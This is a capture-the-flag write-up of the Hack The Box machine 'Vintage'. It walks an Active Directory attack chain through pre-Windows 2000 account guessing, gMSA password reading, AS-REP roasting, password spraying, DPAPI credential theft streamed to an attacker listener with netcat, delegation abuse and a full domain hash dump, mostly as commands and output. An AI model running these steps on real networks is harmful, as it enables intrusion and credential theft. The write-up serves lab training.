Hackthebox: Vintage

Foued SAIDI

Overview

Vintage is a hard-difficulty Hack The Box machine. Starting from assumed-breach credentials, the chain is: guess the password of a pre-Windows 2000 computer account -> use that machine account's ReadGMSAPassword right to recover the gMSA01$ NTLM hash -> abuse gMSA01$'s AddSelf/GenericWrite on the SERVICEMANAGERS group to add our own user -> abuse the group's GenericAll on the SVC_SQL service account by setting the DONT_REQ_PREAUTH flag and AS-REP roasting it -> crack the password -> spray it and find it reused by C.Neri, who gives us the user flag -> extract and decrypt C.Neri's DPAPI credential blob to obtain c.neri_adm -> use c.neri_adm to add SVC_SQL to DELEGATEDADMINS and, through resource-based constrained delegation, impersonate L.BIANCHI_ADM, who has DCSync rights on the domain.

[Figure: Vintage info card]

Reconnaissance

$nmap -A -Pn 10.129.231.205
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-01 09:44 W. Central Africa Standard Time
Nmap scan report for 10.129.231.205
Host is up (0.24s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-01 08:50:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49400/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-12-01T08:51:24
|_ start_date: N/A
|_clock-skew: 5m34s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.85 seconds

The scan shows a Domain Controller (host DC01, domain vintage.htb): Kerberos (88), LDAP/LDAPS (389, 636, 3268, 3269), DNS (53), kpasswd (464) and WinRM (5985) are all exposed. Two details matter for what follows: SMB signing is required, so relaying NTLM to SMB on the DC is not an option, and there is a 5m34s clock skew. Kerberos tolerates five minutes of skew by default, so sync the attacker clock to the DC (for example with ntpdate) before requesting any tickets.

BloodHound Enumeration

Since this is an assumed-breach box, we are given domain credentials (P.Rosa / Rosaisbest123), so we can run bloodhound-python against the DC to collect the domain:

┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -ns 10.129.231.205 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The resolution lifetime expired after 3.105 seconds: Server Do53:10.129.231.205@53 answered The DNS operation timed out.
INFO: Done in 00M 20S
INFO: Compressing output into 20250421184313_bloodhound.zip

The collector also found a second computer object, FS01.vintage.htb, which the DC's DNS does not resolve (hence the warning above). We add dc01.vintage.htb and FS01.vintage.htb to /etc/hosts; the Kerberos tooling used below needs the FQDNs.

In BloodHound, the Domain Computers group has ReadGMSAPassword over the GMSA01$ account, meaning any machine account in the domain can read gMSA01$'s managed password (the msDS-ManagedPassword attribute). So the first goal is to get hold of a computer account.

[Figure: BloodHound, Domain Computers -> ReadGMSAPassword -> GMSA01$]

Initial Compromise - Pre-Windows 2000 Computer Accounts

We can use [pre2k] to test whether any of the computer objects found by BloodHound (fs01$, gmsa01$ and dc01$) was created with the "Assign this computer account as a pre-Windows 2000 computer" option. Such accounts keep a predictable password: the lowercase computer name without the trailing `$`, truncated to 14 characters. In unauth mode pre2k needs no credentials at all; it simply tries that password against the KDC for each name in the input file:

┌──(kali㉿kali)-[~]
└─$ pre2k unauth -d vintage.htb -dc-ip 10.129.231.205 -save -inputfile users

___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.1
\/_/
@garrfoster
@Tw1sm

[19:01:03] INFO Testing started at 2025-04-21 19:01:03
[19:01:03] INFO Using 10 threads
[19:01:03] INFO VALID CREDENTIALS: vintage.htb\fs01$:fs01
[19:01:03] INFO Saving ticket in fs01$.ccache

┌──(kali㉿kali)-[~]
└─$ cat users
GMSA01$
fs01$
dc01$

We got a valid credential for the machine account fs01$, whose password is simply fs01. pre2k also requested a TGT and saved it in fs01$.ccache; point KRB5CCNAME at that file so the Kerberos (-k) tooling below authenticates as fs01$.

Being a domain computer, fs01$ can read the gMSA's managed password. We use bloodyAD to read msDS-ManagedPassword, which it returns both as the raw base64 blob and as the derived NTLM hash:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178
msDS-ManagedPassword.B64ENCODED: cAPhluwn4ijHTUTo7liDUp19VWhIi9/YDwdTpCWVnKNzxHWm2Hl39sN8YUq3hoDfBcLp6S6QcJOnXZ426tWrk0ztluGpZlr3eWU9i6Uwgkaxkvb1ebvy6afUR+mRvtftwY1Vnr5IBKQyLT6ne3BEfEXR5P5iBy2z8brRd3lBHsDrKHNsM+Yd/OOlHS/e1gMiDkEKqZ4dyEakGx5TYviQxGH52ltp1KqT+Ls862fRRlEzwN03oCzkLYg24jvJW/2eK0aXceMgol7J4sFBY0/zAPwEJUg1PZsaqV43xWUrVl79xfcSbyeYKL0e8bKhdxNzdxPlsBcLbFmrdRdlKvE3WQ==

Checking what GMSA01$ can do, we see it has GenericWrite and AddSelf on the SERVICEMANAGERS group:

[Figure: BloodHound, GMSA01$ -> AddSelf / GenericWrite -> SERVICEMANAGERS]

AddSelf alone would only let GMSA01$ add itself, but GenericWrite on the group covers the member attribute, so we can add any principal we like. We request a TGT for GMSA01$ with the NTLM hash we just read, add P.Rosa to the group, and then request a fresh TGT for P.Rosa: group membership is carried in the ticket's PAC, so her existing ticket would not reflect the new group:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 getTGT.py "vintage.htb/GMSA01\$" -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178 -dc-ip dc01.vintage.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in GMSA01$.ccache

┌──(kali㉿kali)-[~/impacket/examples]
└─$ export KRB5CCNAME=GMSA01\$.ccache

┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add groupMember "SERVICEMANAGERS" "P.ROSA"
[+] P.ROSA added to SERVICEMANAGERS
┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 getTGT.py -dc-ip 10.129.231.205 vintage.htb/P.Rosa:Rosaisbest123
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in P.Rosa.ccache

┌──(kali㉿kali)-[~/impacket/examples]
└─$ export KRB5CCNAME=P.Rosa.ccache

Checking what the SERVICEMANAGERS group can do, we see it has GenericAll over the SVC_ARK, SVC_LDAP and SVC_SQL service accounts:

[Figure: BloodHound, SERVICEMANAGERS -> GenericAll -> SVC_ARK, SVC_LDAP, SVC_SQL]

GenericAll lets us write userAccountControl on those accounts. Rather than resetting their passwords (noisy, and it breaks whatever depends on them), we set the DONT_REQ_PREAUTH flag so the KDC hands out an AS-REP encrypted with each account's password-derived key without any pre-authentication, then AS-REP roast the accounts and crack the result offline. Here we do it for SVC_ARK and SVC_SQL:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to SVC_ARK's userAccountControl

┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to SVC_SQL's userAccountControl

┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k remove uac SVC_SQL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from SVC_SQL's userAccountControl

(SVC_SQL was disabled, so we also had to clear its ACCOUNTDISABLE flag: the KDC does not issue tickets for a disabled account, so roasting it would otherwise fail.)
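
Both flag tricks above come down to arithmetic on userAccountControl: a pre-Windows 2000 computer carries WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD (4128) and a predictable password, and an account is AS-REP roastable only while DONT_REQ_PREAUTH is set and ACCOUNTDISABLE is clear. The Python below is an added example written for this write-up, not pre2k or bloodyAD code; the ACCOUNTS snapshot and its UAC values are constructed for illustration, only the account names come from the box.

```python
"""userAccountControl (UAC) helpers for the two flag tricks used above: spotting
pre-Windows 2000 computer accounts and making a service account AS-REP roastable.

Added example for this write-up; it is not pre2k or bloodyAD code. The ACCOUNTS
snapshot at the bottom is constructed: names from the box, UAC values assumed.
"""

UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}

# "Assign this computer account as a pre-Windows 2000 computer" leaves the object with
# WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD = 4128, the value pre2k's LDAP filter matches.
PRE2K_COMPUTER = UAC_FLAGS["WORKSTATION_TRUST_ACCOUNT"] | UAC_FLAGS["PASSWD_NOTREQD"]


def decode_uac(value: int) -> list[str]:
    """Names of the flags set in a userAccountControl value, sorted for stable output."""
    return sorted(name for name, bit in UAC_FLAGS.items() if value & bit)


def add_uac(value: int, *names: str) -> int:
    """What `bloodyAD add uac <account> -f <flag>` does to the attribute: OR the flags in."""
    for name in names:
        value |= UAC_FLAGS[name]
    return value


def remove_uac(value: int, *names: str) -> int:
    """What `bloodyAD remove uac <account> -f <flag>` does: clear the flags."""
    for name in names:
        value &= ~UAC_FLAGS[name]
    return value


def is_pre2k_computer(uac: int) -> bool:
    return uac & PRE2K_COMPUTER == PRE2K_COMPUTER


def pre2k_password(sam_account_name: str) -> str:
    """Default password of a pre-Windows 2000 computer account: the lowercase computer
    name without the trailing '$', truncated to 14 characters."""
    return sam_account_name.rstrip("$").lower()[:14]


def asrep_roastable(uac: int) -> bool:
    """The KDC answers an AS-REQ without pre-authentication only for an enabled account
    with DONT_REQ_PREAUTH set; for a disabled one it returns KDC_ERR_CLIENT_REVOKED."""
    return bool(uac & UAC_FLAGS["DONT_REQ_PREAUTH"]) and not uac & UAC_FLAGS["ACCOUNTDISABLE"]


def svc_sql_flag_edits(initial_uac: int) -> list[int]:
    """Replay the bloodyAD edits made on SVC_SQL above and return each intermediate
    value: add DONT_REQ_PREAUTH, then clear ACCOUNTDISABLE."""
    after_preauth = add_uac(initial_uac, "DONT_REQ_PREAUTH")
    after_enable = remove_uac(after_preauth, "ACCOUNTDISABLE")
    return [initial_uac, after_preauth, after_enable]


# Constructed directory snapshot (UAC values assumed for illustration).
ACCOUNTS = {
    "DC01$": 0x82000,   # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION: a DC, not pre2k
    "FS01$": 0x1020,    # WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD: pre-Windows 2000 computer
    "GMSA01$": 0x1000,  # ordinary workstation trust account
    "SVC_SQL": 0x202,   # NORMAL_ACCOUNT | ACCOUNTDISABLE: disabled user, as found on the box
}


def pre2k_candidates(accounts: dict[str, int]) -> dict[str, str]:
    """sAMAccountName -> candidate password for every account flagged pre-Windows 2000."""
    return {sam: pre2k_password(sam) for sam, uac in accounts.items() if is_pre2k_computer(uac)}


if __name__ == "__main__":
    print("pre2k candidates:", pre2k_candidates(ACCOUNTS))
    steps = ("initial", "+DONT_REQ_PREAUTH", "-ACCOUNTDISABLE")
    for step, uac in zip(steps, svc_sql_flag_edits(ACCOUNTS["SVC_SQL"])):
        print(f"{step:>18}: 0x{uac:x} {decode_uac(uac)} roastable={asrep_roastable(uac)}")
```

The middle step is the one to remember: after only adding DONT_REQ_PREAUTH, SVC_SQL is still not roastable because it is disabled, which is exactly why the write-up's third bloodyAD command was needed.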

Now we can request the AS-REPs with GetNPUsers.py and save the resulting hashes:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 GetNPUsers.py vintage.htb/SVC_SQL -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for SVC_SQL
$krb5asrep$23$SVC_SQL@VINTAGE.HTB:3da7aa9a63095aa109036eccf0c53294$5abb73be992f09985dea289dea5a0914a4e9a439a4f4bdaf6f53de6c49ab7a0ea678b7941f3ee05a9f07f1c53a3a6e72a6b7ecf682bbcfcc2bccf3dc618fcfe4d62d812d13c6c8a741edb8da69f7d7a53b39574db334ca7cdb1dace33f73167150552345715702bc051098982728bf70d379fffb9f04998bf71bf5bf1154b54348c52dd389d2a70e67445fed159a1e39616d9ffbc6ecfb32cfeb073b14af2e2ee551da8d3cfc23382d4c18297be61a8b861e4b92011c4b23ecc737d64f48a52e958113ccd05c4e7eb62f9ead71f525d62edd9c43c454b6dd991249b6bf1b1f61c2a9890d80032cab127b

┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 GetNPUsers.py vintage.htb/SVC_ARK -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for SVC_ARK
$krb5asrep$23$SVC_ARK@VINTAGE.HTB:9c3a66ed5bc9c06915d33708e1670f47$4091cb20f2139022f85472d5031b6e588151f560891d0b8bac7f8805ef5af51738a6944861792d09dd8c13bf7781cf5bdf5d2f6fc8344b2749ee776b50292fccaaf3bc042ee190db5dc048ddc63171e2eff61ed6486c7df4554bdab3d6f620e331106b140fac79b12df4c1ce01e240db7fab7d1cb0a04a64f2dd69012bc60b3464b5f763fe832f8aa81c66de4539d1bb18d84d11ba3558a89bcbd8a5f4e2ed88c39baeb3d9d9ae4a2d482cdcb8040fd7d5fdff79581c11a0ca0fd634321ce97a2ef39eadeb2be692849d85d03d963d34ee51812c09aabe4e22a9d66e024996d2c365691a3912ef3b65f7

Save both hashes to a file and crack them with john:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ john -w=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Zer0the0ne ($krb5asrep$23$SVC_SQL@VINTAGE.HTB)

Only SVC_SQL's hash cracked, giving us that account's password. Service account passwords are often reused, so we spray it with kerbrute against the user list we got from BloodHound. Check the domain lockout policy before spraying; one attempt per user with a single password stays well under any sane threshold:

[Figure: BloodHound user list]

┌──(kali㉿kali)-[~/Downloads]
└─$ ./kerbrute_linux_amd64 passwordspray --dc vintage.htb -d vintage.htb users Zer0the0ne

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/21/25 - Ronnie Flathers @ropnop

2025/04/21 19:36:16 > Using KDC(s):
2025/04/21 19:36:16 > vintage.htb:88

2025/04/21 19:36:16 > [+] VALID LOGIN: C.NERI@vintage.htb:Zer0the0ne
2025/04/21 19:36:16 > [+] VALID LOGIN: SVC_SQL@vintage.htb:Zer0the0ne
2025/04/21 19:36:16 > Done! Tested 16 logins (2 successes) in 0.510 seconds

┌──(kali㉿kali)-[~/Downloads]
└─$ cat users
GMSA01$
C.NERI
G.VIOLA
L.BIANCHI
L.BIANCHI_ADM
C.NERI_ADM
SVC_ARK
SVC_LDAP
SVC_SQL
KRBTGT
ADMINISTRATOR
GUEST
NT AUTHORITY
P.ROSA
R.VERDI
M.ROSSI

The password is valid for SVC_SQL itself and, reused, for C.NERI. C.Neri is a member of Remote Management Users, so we request a TGT for that account and connect with evil-winrm to grab the user flag:

┌──(kali㉿kali)-[~]
└─$ getTGT.py -dc-ip 10.129.231.205 vintage.htb/C.Neri:Zer0the0ne
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in C.Neri.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=C.Neri.ccache

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Documents> cat ../desktop/user.txt
64deb83e04c3c5bf5f9338823a0aaa96
*Evil-WinRM* PS C:\Users\C.Neri\Documents>

Privilege Escalation to Administrator

Credential Dumping via DPAPI to get c.neri_adm

With a shell as C.Neri we can go after saved credentials. Windows Credential Manager blobs live under %APPDATA%\Microsoft\Credentials and are encrypted with a DPAPI master key stored under %APPDATA%\Microsoft\Protect\<SID>\<GUID>; both directories are hidden, so list them with Get-ChildItem -Force. The master key is itself encrypted with a key derived from the user's password and SID, and we know C.Neri's password, so everything can be decrypted offline. Upload nc64.exe with evil-winrm's upload command, then stream the master key file and the credential blob back to our listener:

*Evil-WinRM* PS C:\Users\C.Neri\Documents> cmd /c "./nc64.exe 10.10.16.42 9001 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"

*Evil-WinRM* PS C:\Users\C.Neri\Documents> cmd /c "C:\Users\C.Neri\Documents\nc64.exe 10.10.16.42 9001 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"

On the attacker machine, start a listener before each transfer: the first receives the master key (saved under its GUID name, which is the file dpapi.py is given below), the second the credential blob:

nc -lnvp 9001 > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
nc -lnvp 9001 > dec

Now decrypt the master key with dpapi.py, giving it C.Neri's password and SID (the SID is the directory name under Protect; its last component, RID 1115, is C.Neri's RID, as the domain dump later confirms):

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[MASTERKEYFILE]
Version : 2 (2)
Guid : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

And finally decrypt the credential blob with the recovered master key:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ dpapi.py credential -file dec -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : LegacyGeneric:target=admin_acc
Description :
Unknown :
Username : vintage\c.neri_adm
Unknown : Uncr4ck4bl3P4ssW0rd0312

This gives us credentials for c.neri_adm (saved under the Credential Manager target name admin_acc).

Privesc to Administrator - RBCD with SPN abuse

From BloodHound, c.neri_adm has GenericWrite and AddSelf on the DELEGATEDADMINS group, and l.bianchi_adm is one of its members:

[Figure: BloodHound, C.NERI_ADM -> GenericWrite / AddSelf -> DELEGATEDADMINS]

[Figure: BloodHound, L.BIANCHI_ADM member of DELEGATEDADMINS]

Our goal is to impersonate l.bianchi_adm. Members of DELEGATEDADMINS are trusted for resource-based constrained delegation to DC01 (the RBCD in this section's title), so we need a member whose credentials we hold and whose attributes we can edit: we add the SVC_SQL account, whose password we cracked earlier, to the group using c.neri_adm:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ bloodyAD --host dc01.vintage.htb --dc-ip 10.129.231.205 -d "VINTAGE.HTB" -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
[+] SVC_SQL added to DELEGATEDADMINS

S4U2self only works for an account that has at least one SPN, so give svc_sql an arbitrary one from the WinRM session. Note the Enabled : False in the output below: svc_sql has been disabled again, so clear ACCOUNTDISABLE as before, otherwise the TGT request that follows fails with KDC_ERR_CLIENT_REVOKED:

*Evil-WinRM* PS C:\Users\C.Neri\Documents> Set-ADUser -Identity svc_sql -Add @{servicePrincipalName="cifs/kujen"}
*Evil-WinRM* PS C:\Users\C.Neri\Documents> Get-ADUser -Identity svc_sql -Properties servicePrincipalName


DistinguishedName : CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
Enabled : False
GivenName :
Name : svc_sql
ObjectClass : user
ObjectGUID : 3fb41501-6742-4258-bfbe-602c3a8aa543
SamAccountName : svc_sql
servicePrincipalName : {cifs/kujen}
SID : S-1-5-21-4024337825-2033394866-2055507597-1134
Surname :
UserPrincipalName :

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-getTGT -dc-ip 10.129.231.205 vintage.htb/svc_sql:Zer0the0ne
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_sql.ccache

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ export KRB5CCNAME=svc_sql.ccache

Now perform the S4U exchange with getST: S4U2self obtains a ticket to svc_sql on behalf of l.bianchi_adm (the step that needs the SPN), and S4U2proxy turns it into a service ticket for cifs/dc01.vintage.htb as l.bianchi_adm:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-getST -spn cifs/dc01.vintage.htb -impersonate l.bianchi_adm -k -dc-ip 10.129.231.205 'vintage.htb/svc_sql:Zer0the0ne'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating l.bianchi_adm
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in l.bianchi_adm@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

BloodHound also shows that l.bianchi_adm has DCSync rights on the domain (the Replicating Directory Changes privileges), so with the ticket we just obtained secretsdump can pull every NTDS secret over DRSUAPI. Because the ticket is good for SMB to the DC, it first dumps the DC's SAM and LSA secrets through the remote registry as well, including the DC01$ machine account password and the DPAPI_SYSTEM keys:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ export KRB5CCNAME=l.bianchi_adm@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-secretsdump -k dc01.vintage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb632ebd8c7df30094b6cea89cdf372be
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e41bb21e027286b2e6fd41de81bce8db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VINTAGE\DC01$:plain_password_hex:ca385c025f7b81712d83d60e6c6ac2c6787e877114fe8342bd9b496572c6e1f3d2c82dee411d9bbdb6dc1eb7981bea8a7faa98d2b6efab8b3a90f85d48a3ec66c5f2b4c6d2d4ca747927ab1efd025f66a8e6914917e5d1e6112c7f2a668129ae0303f41f6b0b6c01219c09522da4f5cf9050bed3954973f14a4ff49a12f64d570d6cbd466b81c2ec86c0758213f35cf6db976b25aac295fe3e3953ca30cbe3afc9677d932d95cca63da09ad700abc22a9836ddb44de0be762f12f46eba649b293794f50a946898d1a786dfcac9582bd20e8fd21a9678d1e2d82b7bf3dec2f03bf67ab63d73ec4b34968678a77c3f6106
VINTAGE\DC01$:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x329e3f315c1e7294f086908d3d14c990c030305a
dpapi_userkey:0x2bd12147462ab2b6e92adcb202c9d8258c270790
[*] NL$KM
0000 7E F4 65 54 4C 71 04 1D 24 FC 9B ED 7B 0D B1 1B ~.eTLq..$...{...
0010 F0 E6 0E BF EF 13 78 C1 04 48 9F AE 46 49 39 A5 ......x..H..FI9.
0020 D6 A9 94 E1 CC 13 FB 7D 29 02 00 C1 F8 CD 61 F3 .......}).....a.
0030 8C 6D 56 42 1E 8B 3A 92 E1 8E E0 3C 6E 77 04 BC .mVB..:....<nw..
NL$KM:7ef465544c71041d24fc9bed7b0db11bf0e60ebfef1378c104489fae464939a5d6a994e1cc13fb7d290200c1f8cd61f38c6d56421e8b3a92e18ee03c6e7704bc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:cbec9c4d00eed43294047017fae25d62:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53:::
